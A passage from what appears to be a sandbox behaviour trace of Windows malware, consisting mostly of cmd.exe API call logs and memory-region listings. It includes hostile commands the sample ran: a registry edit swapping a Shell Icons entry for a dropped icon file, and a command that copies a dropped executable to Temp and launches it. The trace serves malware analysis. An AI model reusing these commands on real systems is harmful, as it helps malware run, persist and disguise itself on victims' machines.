dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af448 | out: lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessInformation=0x1af448*(hProcess=0x4c, hThread=0x50, dwProcessId=0xe48, dwThreadId=0xe4c)) returned 1 [0116.449] CloseHandle (hObject=0x50) returned 1 [0116.449] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.449] GetEnvironmentStringsW () returned 0x292418* [0116.449] FreeEnvironmentStringsW (penv=0x292418) returned 1 [0116.449] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0117.146] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af33c | out: lpExitCode=0x1af33c*=0x0) returned 1 [0117.146] CloseHandle (hObject=0x4c) returned 1 [0117.146] _vsnwprintf (in: _Buffer=0x1af484, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af348 | out: _Buffer="00000000") returned 8 [0117.147] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0117.147] GetEnvironmentStringsW () returned 0x292418* [0117.147] FreeEnvironmentStringsW (penv=0x292418) returned 1 [0117.147] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0117.147] GetEnvironmentStringsW () returned 0x292418* [0117.147] FreeEnvironmentStringsW (penv=0x292418) returned 1 [0117.147] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af3a0 | out: lpAttributeList=0x1af3a0) [0117.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.147] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.147] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.147] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.147] 
GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.147] SetConsoleInputExeNameW () returned 0x1 [0117.147] GetConsoleOutputCP () returned 0x1b5 [0117.147] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.147] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.148] exit (_Code=0) Process: id = "45" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xd94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7407 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7408 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7409 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7410 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = 
"private_0x00000000001b0000" filename = "" Region: id = 7411 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7412 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7413 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7414 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7415 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7416 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7742 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7743 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7744 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7745 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7746 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = 
"" Region: id = 7747 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 7748 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7749 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7750 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7751 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7752 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7753 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7754 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7755 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7756 
start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 7757 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7758 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7759 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 7760 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 7761 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7762 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 7763 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 7764 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 7765 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 7830 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7980 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 
region_type = mapped_file name = "w588h5dn.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe") Thread: id = 73 os_tid = 0xd98 [0114.927] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af844 | out: lpSystemTimeAsFileTime=0x2af844*(dwLowDateTime=0x81e4e760, dwHighDateTime=0x1d440a9)) [0114.927] GetCurrentProcessId () returned 0xd94 [0114.927] GetCurrentThreadId () returned 0xd98 [0114.928] GetTickCount () returned 0x27483 [0114.928] QueryPerformanceCounter (in: lpPerformanceCount=0x2af83c | out: lpPerformanceCount=0x2af83c*=17171676450) returned 1 [0114.928] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0114.928] __set_app_type (_Type=0x1) [0114.928] __p__fmode () returned 0x76b331f4 [0114.928] __p__commode () returned 0x76b331fc [0114.928] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0114.928] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0114.928] GetCurrentThreadId () returned 0xd98 [0114.929] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd98) returned 0x38 [0114.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.929] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0114.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.929] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.929] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af7d4 | out: phkResult=0x2af7d4*=0x0) returned 0x2 [0114.929] VirtualQuery (in: lpAddress=0x2af80b, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x2af000, 
AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0114.929] GetConsoleOutputCP () returned 0x1b5 [0114.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.929] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0114.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0114.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.930] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0114.930] _get_osfhandle (_FileHandle=0) returned 0x3 
[0114.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.930] GetEnvironmentStringsW () returned 0x90388* [0114.930] FreeEnvironmentStringsW (penv=0x90388) returned 1 [0114.930] GetEnvironmentStringsW () returned 0x90388* [0114.930] FreeEnvironmentStringsW (penv=0x90388) returned 1 [0114.930] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae744 | out: phkResult=0x2ae744*=0x40) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x38, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x0, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegCloseKey (hKey=0x40) returned 0x0 [0114.931] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae744 | out: phkResult=0x2ae744*=0x40) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x0, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x9, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x9, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, 
lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x9, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegCloseKey (hKey=0x40) returned 0x0 [0114.931] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635b [0114.931] srand (_Seed=0x5b88635b) [0114.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0114.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0114.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.932] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x91ae8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.932] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.932] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.932] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.932] _wcsicmp (_String1="PROMPT", 
_String2="ERRORLEVEL") returned 11 [0114.932] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.932] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.932] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.932] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.932] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.932] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.932] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.932] GetEnvironmentStringsW () returned 0x924d8* [0114.932] FreeEnvironmentStringsW (penv=0x924d8) returned 1 [0114.932] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.932] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.932] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.932] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.932] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.932] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.932] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.932] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.932] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.932] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.933] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af510, lpFilePart=0x2af50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af50c*="Desktop") returned 0x18 [0114.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.933] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af28c | out: lpFindFileData=0x2af28c) returned 0x90b68 [0114.933] FindClose (in: hFindFile=0x90b68 | out: hFindFile=0x90b68) returned 1 [0114.933] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af28c | out: lpFindFileData=0x2af28c) returned 0x90b68 [0114.933] FindClose (in: hFindFile=0x90b68 | out: hFindFile=0x90b68) returned 1 [0114.933] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af28c | out: lpFindFileData=0x2af28c) returned 0x90b68 [0114.933] FindClose (in: hFindFile=0x90b68 | out: hFindFile=0x90b68) returned 1 [0114.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.933] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0114.933] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0114.933] GetEnvironmentStringsW () returned 0x90388* [0114.934] FreeEnvironmentStringsW (penv=0x90388) returned 1 [0114.934] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.934] GetConsoleOutputCP () returned 0x1b5 [0114.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.934] GetUserDefaultLCID () returned 0x409 [0114.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af650, cchData=128 | out: lpLCData="0") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af650, cchData=128 | out: lpLCData="0") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af650, cchData=128 | out: lpLCData="1") returned 2 
[0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0114.935] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.936] GetConsoleTitleW (in: lpConsoleTitle=0x80a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.936] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0114.936] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0114.936] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0114.937] _wcsicmp (_String1="type", _String2=")") returned 75 [0114.937] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0114.937] _wcsicmp (_String1="FOR/?", 
